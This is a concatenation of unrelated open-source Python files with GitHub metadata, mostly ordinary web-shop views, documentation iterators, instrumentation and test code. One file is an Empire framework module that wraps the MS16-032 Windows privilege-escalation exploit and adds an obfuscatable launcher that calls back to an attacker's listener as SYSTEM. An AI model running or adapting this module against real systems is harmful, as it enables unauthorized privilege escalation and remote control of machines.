paginate_by = settings.OSCAR_ORDERS_PER_PAGE
model = Order
form_class = OrderSearchForm
page_title = _('Order History')
active_tab = 'orders'
def get(self, request, *args, **kwargs):
if 'date_from' in request.GET:
self.form = self.form_class(self.request.GET)
if not self.form.is_valid():
self.object_list = self.get_queryset()
ctx = self.get_context_data(object_list=self.object_list)
return self.render_to_response(ctx)
data = self.form.cleaned_data
# If the user has just entered an order number, try and look it up
# and redirect immediately to the order detail page.
if data['order_number'] and not (data['date_to'] or
data['date_from']):
try:
order = Order.objects.get(
number=data['order_number'], user=self.request.user)
except Order.DoesNotExist:
pass
else:
return redirect(
'customer:order', order_number=order.number)
else:
self.form = self.form_class()
return super(OrderHistoryView, self).get(request, *args, **kwargs)
def get_queryset(self):
qs = self.model._default_manager.filter(user=self.request.user)
if self.form.is_bound and self.form.is_valid():
qs = qs.filter(**self.form.get_filters())
return qs
def get_context_data(self, *args, **kwargs):
ctx = super(OrderHistoryView, self).get_context_data(*args, **kwargs)
ctx['form'] = self.form
return ctx
class OrderDetailView(PageTitleMixin, PostActionMixin, generic.DetailView):
model = Order
active_tab = 'orders'
def get_template_names(self):
return ["customer/order/order_detail.html"]
def get_page_title(self):
"""
Order number as page title
"""
return u'%s #%s' % (_('Order'), self.object.number)
def get_object(self, queryset=None):
return get_object_or_404(self.model, user=self.request.user,
number=self.kwargs['order_number'])
def do_reorder(self, order): # noqa (too complex (10))
"""
'Re-order' a previous order.
This puts the contents of the previous order into your basket
"""
# Collect lines to be added to the basket and any warnings for lines
# that are no longer available.
basket = self.request.basket
lines_to_add = []
warnings = []
for line in order.lines.all():
is_available, reason = line.is_available_to_reorder(
basket, self.request.strategy)
if is_available:
lines_to_add.append(line)
else:
warnings.append(reason)
# Check whether the number of items in the basket won't exceed the
# maximum.
total_quantity = sum([line.quantity for line in lines_to_add])
is_quantity_allowed, reason = basket.is_quantity_allowed(
total_quantity)
if not is_quantity_allowed:
messages.warning(self.request, reason)
self.response = redirect('customer:order-list')
return
# Add any warnings
for warning in warnings:
messages.warning(self.request, warning)
for line in lines_to_add:
options = []
for attribute in line.attributes.all():
if attribute.option:
options.append({
'option': attribute.option,
'value': attribute.value})
basket.add_product(line.product, line.quantity, options)
if len(lines_to_add) > 0:
self.response = redirect('basket:summary')
messages.info(
self.request,
_("All available lines from order %(number)s "
"have been added to your basket") % {'number': order.number})
else:
self.response = redirect('customer:order-list')
messages.warning(
self.request,
_("It is not possible to re-order order %(number)s "
"as none of its lines are available to purchase") %
{'number': order.number})
class OrderLineView(PostActionMixin, generic.DetailView):
"""Customer order line"""
def get_object(self, queryset=None):
order = get_object_or_404(Order, user=self.request.user,
number=self.kwargs['order_number'])
return order.lines.get(id=self.kwargs['line_id'])
def do_reorder(self, line):
self.response = redirect('customer:order', self.kwargs['order_number'])
basket = self.request.basket
line_available_to_reorder, reason = line.is_available_to_reorder(
basket, self.request.strategy)
if not line_available_to_reorder:
messages.warning(self.request, reason)
return
# We need to pass response to the get_or_create... method
# as a new basket might need to be created
self.response = redirect('basket:summary')
# Convert line attributes into basket options
options = []
for attribute in line.attributes.all():
if attribute.option:
options.append({'option': attribute.option,
'value': attribute.value})
basket.add_product(line.product, line.quantity, options)
if line.quantity > 1:
msg = _("%(qty)d copies of '%(product)s' have been added to your"
" basket") % {
'qty': line.quantity, 'product': line.product}
else:
msg = _("'%s' has been added to your basket") % line.product
messages.info(self.request, msg)
class AnonymousOrderDetailView(generic.DetailView):
model = Order
template_name = "customer/anon_order.html"
def get_object(self, queryset=None):
# Check URL hash matches that for order to prevent spoof attacks
order = get_object_or_404(self.model, user=None,
number=self.kwargs['order_number'])
if self.kwargs['hash'] != order.verification_hash():
raise http.Http404()
return order
# ------------
# Address book
# ------------
class AddressListView(PageTitleMixin, generic.ListView):
"""Customer address book"""
context_object_name = "addresses"
template_name = 'customer/address/address_list.html'
paginate_by = settings.OSCAR_ADDRESSES_PER_PAGE
active_tab = 'addresses'
page_title = _('Address Book')
def get_queryset(self):
"""Return customer's addresses"""
return UserAddress._default_manager.filter(user=self.request.user)
class AddressCreateView(PageTitleMixin, generic.CreateView):
form_class = UserAddressForm
model = UserAddress
template_name = 'customer/address/address_form.html'
active_tab = 'addresses'
page_title = _('Add a new address')
success_url = reverse_lazy('customer:address-list')
def get_form_kwargs(self):
kwargs = super(AddressCreateView, self).get_form_kwargs()
kwargs['user'] = self.request.user
return kwargs
def get_context_data(self, **kwargs):
ctx = super(AddressCreateView, self).get_context_data(**kwargs)
ctx['title'] = _('Add a new address')
return ctx
def get_success_url(self):
messages.success(self.request,
_("Address '%s' created") % self.object.summary)
return super(AddressCreateView, self).get_success_url()
class AddressUpdateView(PageTitleMixin, generic.UpdateView):
form_class = UserAddressForm
model = UserAddress
template_name = 'customer/address/address_form.html'
active_tab = 'addresses'
page_title = _('Edit address')
success_url = reverse_lazy('customer:address-list')
def get_form_kwargs(self):
kwargs = super(AddressUpdateView, self).get_form_kwargs()
kwargs['user'] = self.request.user
return kwargs
def get_context_data(self, **kwargs):
ctx = super(AddressUpdateView, self).get_context_data(**kwargs)
ctx['title'] = _('Edit address')
return ctx
def get_queryset(self):
return self.request.user.addresses.all()
def get_success_url(self):
messages.success(self.request,
_("Address '%s' updated") % self.object.summary)
return super(AddressUpdateView, self).get_success_url()
class AddressDeleteView(PageTitleMixin, generic.DeleteView):
model = UserAddress
template_name = "customer/address/address_delete.html"
page_title = _('Delete address?')
active_tab = 'addresses'
context_object_name = 'address'
success_url = reverse_lazy('customer:address-list')
def get_queryset(self):
return UserAddress._default_manager.filter(user=self.request.user)
def get_success_url(self):
messages.success(self.request,
_("Address '%s' deleted") % self.object.summary)
return super(AddressDeleteView, self).get_success_url()
class AddressChangeStatusView(generic.RedirectView):
"""
Sets an address as default_for_(billing|shipping)
"""
url = reverse_lazy('customer:address-list')
permanent = False
def get(self, request, pk=None, action=None, *args, **kwargs):
address = get_object_or_404(UserAddress, user=self.request.user,
pk=pk)
# We don't want the user to set an address as the default shipping
# address, though they should be able to set it as their billing
# address.
if address.country.is_shipping_country:
setattr(address, 'is_%s' % action, True)
elif action == 'default_for_billing':
setattr(address, 'is_default_for_billing', True)
else:
messages.error(request, _('We do not ship to this country'))
address.save()
return super(AddressChangeStatusView, self).get(
request, *args, **kwargs)
|
{
"content_hash": "35fee8afa86f3422efa03a4de5bd5a7e",
"timestamp": "",
"source": "github",
"line_count": 718,
"max_line_length": 79,
"avg_line_length": 36.28272980501393,
"alnum_prop": 0.6202449042263253,
"repo_name": "john-parton/django-oscar",
"id": "042dc37e390cb2276571bd79e1129c17f1cab840",
"size": "26051",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "src/oscar/apps/customer/views.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "542048"
},
{
"name": "HTML",
"bytes": "495616"
},
{
"name": "JavaScript",
"bytes": "413706"
},
{
"name": "Makefile",
"bytes": "2653"
},
{
"name": "Python",
"bytes": "1712293"
},
{
"name": "Shell",
"bytes": "2751"
}
],
"symlink_target": ""
}
|
"""
sphinx.ext.napoleon.iterators
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
A collection of helpful iterators.
:copyright: Copyright 2007-2016 by the Sphinx team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import collections
class peek_iter(object):
"""An iterator object that supports peeking ahead.
Parameters
----------
o : iterable or callable
`o` is interpreted very differently depending on the presence of
`sentinel`.
If `sentinel` is not given, then `o` must be a collection object
which supports either the iteration protocol or the sequence protocol.
If `sentinel` is given, then `o` must be a callable object.
sentinel : any value, optional
If given, the iterator will call `o` with no arguments for each
call to its `next` method; if the value returned is equal to
`sentinel`, :exc:`StopIteration` will be raised, otherwise the
value will be returned.
See Also
--------
`peek_iter` can operate as a drop in replacement for the built-in
`iter <https://docs.python.org/2/library/functions.html#iter>`_ function.
Attributes
----------
sentinel
The value used to indicate the iterator is exhausted. If `sentinel`
was not given when the `peek_iter` was instantiated, then it will
be set to a new object instance: ``object()``.
"""
def __init__(self, *args):
"""__init__(o, sentinel=None)"""
self._iterable = iter(*args)
self._cache = collections.deque()
if len(args) == 2:
self.sentinel = args[1]
else:
self.sentinel = object()
def __iter__(self):
return self
def __next__(self, n=None):
# note: prevent 2to3 to transform self.next() in next(self) which
# causes an infinite loop !
return getattr(self, 'next')(n)
def _fillcache(self, n):
"""Cache `n` items. If `n` is 0 or None, then 1 item is cached."""
if not n:
n = 1
try:
while len(self._cache) < n:
self._cache.append(next(self._iterable))
except StopIteration:
while len(self._cache) < n:
self._cache.append(self.sentinel)
def has_next(self):
"""Determine if iterator is exhausted.
Returns
-------
bool
True if iterator has more items, False otherwise.
Note
----
Will never raise :exc:`StopIteration`.
"""
return self.peek() != self.sentinel
def next(self, n=None):
"""Get the next item or `n` items of the iterator.
Parameters
----------
n : int or None
The number of items to retrieve. Defaults to None.
Returns
-------
item or list of items
The next item or `n` items of the iterator. If `n` is None, the
item itself is returned. If `n` is an int, the items will be
returned in a list. If `n` is 0, an empty list is returned.
Raises
------
StopIteration
Raised if the iterator is exhausted, even if `n` is 0.
"""
self._fillcache(n)
if not n:
if self._cache[0] == self.sentinel:
raise StopIteration
if n is None:
result = self._cache.popleft()
else:
result = []
else:
if self._cache[n - 1] == self.sentinel:
raise StopIteration
result = [self._cache.popleft() for i in range(n)]
return result
def peek(self, n=None):
"""Preview the next item or `n` items of the iterator.
The iterator is not advanced when peek is called.
Returns
-------
item or list of items
The next item or `n` items of the iterator. If `n` is None, the
item itself is returned. If `n` is an int, the items will be
returned in a list. If `n` is 0, an empty list is returned.
If the iterator is exhausted, `peek_iter.sentinel` is returned,
or placed as the last item in the returned list.
Note
----
Will never raise :exc:`StopIteration`.
"""
self._fillcache(n)
if n is None:
result = self._cache[0]
else:
result = [self._cache[i] for i in range(n)]
return result
class modify_iter(peek_iter):
"""An iterator object that supports modifying items as they are returned.
Parameters
----------
o : iterable or callable
`o` is interpreted very differently depending on the presence of
`sentinel`.
If `sentinel` is not given, then `o` must be a collection object
which supports either the iteration protocol or the sequence protocol.
If `sentinel` is given, then `o` must be a callable object.
sentinel : any value, optional
If given, the iterator will call `o` with no arguments for each
call to its `next` method; if the value returned is equal to
`sentinel`, :exc:`StopIteration` will be raised, otherwise the
value will be returned.
modifier : callable, optional
The function that will be used to modify each item returned by the
iterator. `modifier` should take a single argument and return a
single value. Defaults to ``lambda x: x``.
If `sentinel` is not given, `modifier` must be passed as a keyword
argument.
Attributes
----------
modifier : callable
`modifier` is called with each item in `o` as it is iterated. The
return value of `modifier` is returned in lieu of the item.
Values returned by `peek` as well as `next` are affected by
`modifier`. However, `modify_iter.sentinel` is never passed through
`modifier`; it will always be returned from `peek` unmodified.
Example
-------
>>> a = [" A list ",
... " of strings ",
... " with ",
... " extra ",
... " whitespace. "]
>>> modifier = lambda s: s.strip().replace('with', 'without')
>>> for s in modify_iter(a, modifier=modifier):
... print('"%s"' % s)
"A list"
"of strings"
"without"
"extra"
"whitespace."
"""
def __init__(self, *args, **kwargs):
"""__init__(o, sentinel=None, modifier=lambda x: x)"""
if 'modifier' in kwargs:
self.modifier = kwargs['modifier']
elif len(args) > 2:
self.modifier = args[2]
args = args[:2]
else:
self.modifier = lambda x: x
if not callable(self.modifier):
raise TypeError('modify_iter(o, modifier): '
'modifier must be callable')
super(modify_iter, self).__init__(*args)
def _fillcache(self, n):
"""Cache `n` modified items. If `n` is 0 or None, 1 item is cached.
Each item returned by the iterator is passed through the
`modify_iter.modified` function before being cached.
"""
if not n:
n = 1
try:
while len(self._cache) < n:
self._cache.append(self.modifier(next(self._iterable)))
except StopIteration:
while len(self._cache) < n:
self._cache.append(self.sentinel)
|
{
"content_hash": "e5a063f13f411865ee16eaab5252ba00",
"timestamp": "",
"source": "github",
"line_count": 238,
"max_line_length": 78,
"avg_line_length": 31.42436974789916,
"alnum_prop": 0.557694878994518,
"repo_name": "neerajvashistha/pa-dude",
"id": "f66d67f2ce518148a56bd64774c1fbe7e45c4725",
"size": "7503",
"binary": false,
"copies": "7",
"ref": "refs/heads/master",
"path": "lib/python2.7/site-packages/sphinx/ext/napoleon/iterators.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "359307"
},
{
"name": "C++",
"bytes": "5695"
},
{
"name": "CSS",
"bytes": "114504"
},
{
"name": "FORTRAN",
"bytes": "3707"
},
{
"name": "HTML",
"bytes": "216904"
},
{
"name": "JavaScript",
"bytes": "1323680"
},
{
"name": "Makefile",
"bytes": "2299"
},
{
"name": "Python",
"bytes": "31341230"
},
{
"name": "Self",
"bytes": "40307"
},
{
"name": "Shell",
"bytes": "5427"
},
{
"name": "TeX",
"bytes": "96790"
},
{
"name": "XSLT",
"bytes": "152770"
}
],
"symlink_target": ""
}
|
from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Invoke-MS16032',
'Author': ['@FuzzySec', '@leoloobeek'],
'Description': ('Spawns a new Listener as SYSTEM by'
' leveraging the MS16-032 local exploit.'
' Note: ~1/6 times the exploit won\'t work, may need to retry.'),
'Background' : True,
'OutputExtension' : None,
'NeedsAdmin' : False,
'OpsecSafe' : False,
'Language' : 'powershell',
'MinLanguageVersion' : '2',
'Comments': [
'Credit to James Forshaw (@tiraniddo) for exploit discovery and',
'to Ruben Boonen (@FuzzySec) for PowerShell PoC',
'https://googleprojectzero.blogspot.co.uk/2016/03/exploiting-leaked-thread-handle.html',
'https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-MS16-032.ps1'
]
}
self.options = {
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
},
'Listener' : {
'Description' : 'Listener to use.',
'Required' : True,
'Value' : ''
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'Proxy' : {
'Description' : 'Proxy to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'ProxyCreds' : {
'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
}
}
self.mainMenu = mainMenu
if params:
for param in params:
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
moduleSource = self.mainMenu.installPath + "/data/module_source/privesc/Invoke-MS16032.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
# generate the launcher code without base64 encoding
l = self.mainMenu.stagers.stagers['multi/launcher']
l.options['Listener']['Value'] = self.options['Listener']['Value']
l.options['UserAgent']['Value'] = self.options['UserAgent']['Value']
l.options['Proxy']['Value'] = self.options['Proxy']['Value']
l.options['ProxyCreds']['Value'] = self.options['ProxyCreds']['Value']
l.options['Base64']['Value'] = 'False'
launcherCode = l.generate()
# need to escape characters
launcherCode = launcherCode.replace("`", "``").replace("$", "`$").replace("\"","'")
scriptEnd = 'Invoke-MS16032 -Command "' + launcherCode + '"'
scriptEnd += ';`nInvoke-MS16032 completed.'
if obfuscate:
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
|
{
"content_hash": "918e51290294d71926b382d726562f0c",
"timestamp": "",
"source": "github",
"line_count": 106,
"max_line_length": 131,
"avg_line_length": 38.22641509433962,
"alnum_prop": 0.5125863770977295,
"repo_name": "ThePirateWhoSmellsOfSunflowers/Empire",
"id": "a78fb840253a96b66ad706b9e03fd5a2e7a86f71",
"size": "4052",
"binary": false,
"copies": "9",
"ref": "refs/heads/master",
"path": "lib/modules/powershell/privesc/ms16-032.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "1966"
},
{
"name": "Java",
"bytes": "496"
},
{
"name": "Objective-C",
"bytes": "2664"
},
{
"name": "PHP",
"bytes": "2198"
},
{
"name": "PowerShell",
"bytes": "17003288"
},
{
"name": "Python",
"bytes": "2787352"
},
{
"name": "Shell",
"bytes": "10123"
}
],
"symlink_target": ""
}
|
from django.core.management import execute_from_command_line
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE",
"ray.tune.automlboard.settings")
execute_from_command_line(sys.argv)
|
{
"content_hash": "5b1a03edb344d5e262271972ef756775",
"timestamp": "",
"source": "github",
"line_count": 8,
"max_line_length": 60,
"avg_line_length": 32.625,
"alnum_prop": 0.6628352490421456,
"repo_name": "pcmoritz/ray-1",
"id": "e3c599cde2325e8dc47f3d7e11fde349608ec5fb",
"size": "283",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "python/ray/tune/automlboard/manage.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "70670"
},
{
"name": "C++",
"bytes": "4670851"
},
{
"name": "CSS",
"bytes": "10912"
},
{
"name": "Dockerfile",
"bytes": "14159"
},
{
"name": "HTML",
"bytes": "30414"
},
{
"name": "Java",
"bytes": "1338604"
},
{
"name": "JavaScript",
"bytes": "914"
},
{
"name": "Jupyter Notebook",
"bytes": "1615"
},
{
"name": "Makefile",
"bytes": "234"
},
{
"name": "Python",
"bytes": "10523389"
},
{
"name": "Shell",
"bytes": "117557"
},
{
"name": "Smarty",
"bytes": "239"
},
{
"name": "Starlark",
"bytes": "238506"
},
{
"name": "TypeScript",
"bytes": "259269"
}
],
"symlink_target": ""
}
|
"""
Simple Counter
~~~~~~~~~~~~~~
Instrumentation example that gathers method invocation counts
and dumps the numbers when the program exists, in JSON format.
:copyright: (c) 2014 by Romain Gaucher (@rgaucher)
:license: Apache 2, see LICENSE for more details.
"""
import sys
from equip import Program, \
Instrumentation, \
SimpleRewriter, \
MethodVisitor
import equip.utils.log as logutils
from equip.utils.log import logger
logutils.enableLogger(to_file='./equip.log')
# Declaration of the code to be injected in various places. This
# code is compiled to bytecode which is then added to the various
# code_objects (e.g., method, etc.) based on what the visitor specifies.
BEFORE_CODE = """
GlobalCounterInst.count(file='{file_name}',
class_name='{class_name}',
method='{method_name}',
lineno={lineno})
"""
# We need to inject a new import statement that contains the GlobalCounterInst
IMPORT_CODE = """
from counter import GlobalCounterInst
"""
ON_ENTER_CODE = """
print "Starting instrumented program"
"""
# When the instrumented code exits, we want to serialize the data
ON_EXIT_CODE = """
GlobalCounterInst.to_json('./data.json')
"""
# The visitor is called for each method in the program (function or method)
class CounterInstrumentationVisitor(MethodVisitor):
def __init__(self):
MethodVisitor.__init__(self)
def visit(self, meth_decl):
rewriter = SimpleRewriter(meth_decl)
# Ensure we have imported our `GlobalCounterInst`
rewriter.insert_import(IMPORT_CODE, module_import=True)
# This is the main instrumentation code with a callback to
# `GlobalCounterInst::count`
rewriter.insert_before(BEFORE_CODE)
HELP_MESSAGE = """
1. Run counter_instrument.py on the code you want to instrument:
$ python counter_instrument.py <path/to/code>
2. Run your original program:
$ export PYTHONPATH=$PYTHONPATH:/path/to/counter
$ python start_my_program.pyc
"""
def main(argc, argv):
if argc < 2:
print HELP_MESSAGE
return
visitor = CounterInstrumentationVisitor()
instr = Instrumentation(argv[1])
instr.set_option('force-rebuild')
if not instr.prepare_program():
print "[ERROR] Cannot find program code to instrument"
return
# Add code at the very beginning of each module (only triggered if __main__ routine)
instr.on_enter(ON_ENTER_CODE)
# Add code at the end of each module (only triggered if __main__ routine)
instr.on_exit(ON_EXIT_CODE)
# Apply the instrumentation with the visitor, and when a change has been made
# it will overwrite the pyc file.
instr.apply(visitor, rewrite=True)
if __name__ == '__main__':
main(len(sys.argv), sys.argv)
|
{
"content_hash": "1576591f693aea34c6c54a1cf886a0f1",
"timestamp": "",
"source": "github",
"line_count": 95,
"max_line_length": 86,
"avg_line_length": 29.305263157894736,
"alnum_prop": 0.6871408045977011,
"repo_name": "neuroo/equip",
"id": "350da5278ed33f4e5b4fef23b62b9621ad7d533d",
"size": "2808",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "examples/counter/counter_instrument.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "263644"
}
],
"symlink_target": ""
}
|
import logging
from ironic.openstack.common import notifier
from oslo.config import cfg
class PublishErrorsHandler(logging.Handler):
def emit(self, record):
if ('ironic.openstack.common.notifier.log_notifier' in
cfg.CONF.notification_driver):
return
notifier.api.notify(None, 'error.publisher',
'error_notification',
notifier.api.ERROR,
dict(error=record.msg))
|
{
"content_hash": "d5b5c541f654b7f57d4ed140e406c58a",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 62,
"avg_line_length": 31.0625,
"alnum_prop": 0.5875251509054326,
"repo_name": "citrix-openstack-build/ironic",
"id": "fb2848581f8581fe7ebb1eb4691e2a4a8908cdd4",
"size": "1143",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ironic/openstack/common/log_handler.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "19934"
},
{
"name": "JavaScript",
"bytes": "7403"
},
{
"name": "Python",
"bytes": "1142333"
}
],
"symlink_target": ""
}
|
import sark
from DIE.Lib import DIEDb
db = DIEDb.get_db() # A global DIE database instance
def does_return_string(function):
"""
Check if a function returns a string.
@param function: db_DataTypes.dbFunction object
@return: True if the function return value contains a string
"""
for ctx in function.function_contexts:
ret_val = db.get_dbg_value(db.get_function_context(ctx).ret_arg_value)
parsed_values = db.get_parsed_values(ret_val)
if parsed_values:
for value in parsed_values:
if value.type == "basicstring":
return True
return False
def get_all_functions_returning_strings(functions):
"""
Get all functions with string in return values
@param functions: List of db_DataTypes.dbFunction objects
@return: a list of db_DataTypes.dbFunction objects containing strings in return value
"""
fs = []
for f in functions:
if does_return_string(f):
fs.append(f)
return fs
def get_most_called_n(functions, n):
"""
Get the n`th most called functions
@param functions: List of db_DataTypes.dbFunction objects
@param n: Sum of returned functions
@return: a list of the top n`th called db_DataTypes.dbFunction objects
"""
call_counts = ((function, len(function.function_contexts)) for function in functions)
sorted_funcs = sorted(call_counts, key=lambda x: x[1], reverse=True)
return [count[0] for count in sorted_funcs[:n]]
def get_non_lib(functions):
"""
Get all non-library functions
@param functions: List of db_DataTypes.dbFunction objects
@return: a subset list of db_DataTypes.dbFunction objects that are not library functions.
"""
return [f for f in functions if not f.is_lib_func]
def sort_by_xrefs(functions):
"""
Sort by the number of Xrefs to the fucntion
@param functions: List of db_DataTypes.dbFunction objects
@return: a sorted list of db_DataTypes.dbFunction objects by Xref count.
"""
xref_counts = []
for f in functions:
try:
xref_counts.append((f, (len(list(sark.Function(ea=f.function_start).xrefs_to)))))
except sark.exceptions.SarkNoFunction:
pass
sorted_funcs = sorted(xref_counts, key=lambda x: x[1], reverse=True)
return [count[0] for count in sorted_funcs]
# no_lib_funcs = get_non_lib(functions)
# funcs_returning_strings = get_all_functions_returning_strings(no_lib_funcs)
# most_called_funcs = get_most_called_n(funcs_returning_strings, 10)
# sorted_funcs = sort_by_xrefs(most_called_funcs)
#
#
# for f in sorted_funcs:
# print f.function_name, len(list(sark.Function(ea=f.function_start).xrefs_to))
|
{
"content_hash": "d1f8186224ef113da39a6250bfba2010",
"timestamp": "",
"source": "github",
"line_count": 81,
"max_line_length": 93,
"avg_line_length": 33.666666666666664,
"alnum_prop": 0.674000733406674,
"repo_name": "AlexWMF/DIE",
"id": "e09b292449066616f2c90b387271ad38a6c92978",
"size": "3134",
"binary": false,
"copies": "9",
"ref": "refs/heads/master",
"path": "DIE/Lib/DBUtils.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "256348"
}
],
"symlink_target": ""
}
|
from datetime import date, timedelta
from django.conf import settings
from django.contrib.auth.models import User, AnonymousUser
from django.contrib.auth.tokens import PasswordResetTokenGenerator
from django.test import TestCase
class TokenGeneratorTest(TestCase):
def test_make_token(self):
"""
Ensure that we can make a token and that it is valid
"""
user = User.objects.create_user('tokentestuser', 'test2@example.com', 'testpw')
p0 = PasswordResetTokenGenerator()
tk1 = p0.make_token(user)
self.assertTrue(p0.check_token(user, tk1))
def test_10265(self):
"""
Ensure that the token generated for a user created in the same request
will work correctly.
"""
# See ticket #10265
user = User.objects.create_user('comebackkid', 'test3@example.com', 'testpw')
p0 = PasswordResetTokenGenerator()
tk1 = p0.make_token(user)
reload = User.objects.get(username='comebackkid')
tk2 = p0.make_token(reload)
self.assertEqual(tk1, tk2)
def test_timeout(self):
"""
Ensure we can use the token after n days, but no greater.
"""
# Uses a mocked version of PasswordResetTokenGenerator so we can change
# the value of 'today'
class Mocked(PasswordResetTokenGenerator):
def __init__(self, today):
self._today_val = today
def _today(self):
return self._today_val
user = User.objects.create_user('tokentestuser', 'test2@example.com', 'testpw')
p0 = PasswordResetTokenGenerator()
tk1 = p0.make_token(user)
p1 = Mocked(date.today() + timedelta(settings.PASSWORD_RESET_TIMEOUT_DAYS))
self.assertTrue(p1.check_token(user, tk1))
p2 = Mocked(date.today() + timedelta(settings.PASSWORD_RESET_TIMEOUT_DAYS + 1))
self.assertFalse(p2.check_token(user, tk1))
def test_django12_hash(self):
"""
Ensure we can use the hashes generated by Django 1.2
"""
# Hard code in the Django 1.2 algorithm (not the result, as it is time
# dependent)
def _make_token(user):
from django.utils.hashcompat import sha_constructor
from django.utils.http import int_to_base36
timestamp = (date.today() - date(2001,1,1)).days
ts_b36 = int_to_base36(timestamp)
hash = sha_constructor(settings.SECRET_KEY + unicode(user.id) +
user.password + user.last_login.strftime('%Y-%m-%d %H:%M:%S') +
unicode(timestamp)).hexdigest()[::2]
return "%s-%s" % (ts_b36, hash)
user = User.objects.create_user('tokentestuser', 'test2@example.com', 'testpw')
p0 = PasswordResetTokenGenerator()
tk1 = _make_token(user)
self.assertTrue(p0.check_token(user, tk1))
|
{
"content_hash": "565dcc151189c1ae68a2a2f06d22768e",
"timestamp": "",
"source": "github",
"line_count": 74,
"max_line_length": 98,
"avg_line_length": 39.67567567567568,
"alnum_prop": 0.6103542234332425,
"repo_name": "brunogamacatao/portalsaladeaula",
"id": "623e5da66af5119a82c6b4c29481139562902c67",
"size": "2936",
"binary": false,
"copies": "18",
"ref": "refs/heads/master",
"path": "django/contrib/auth/tests/tokens.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "84537"
},
{
"name": "JavaScript",
"bytes": "616811"
},
{
"name": "Python",
"bytes": "4545655"
},
{
"name": "Ruby",
"bytes": "2070"
},
{
"name": "Shell",
"bytes": "53"
}
],
"symlink_target": ""
}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.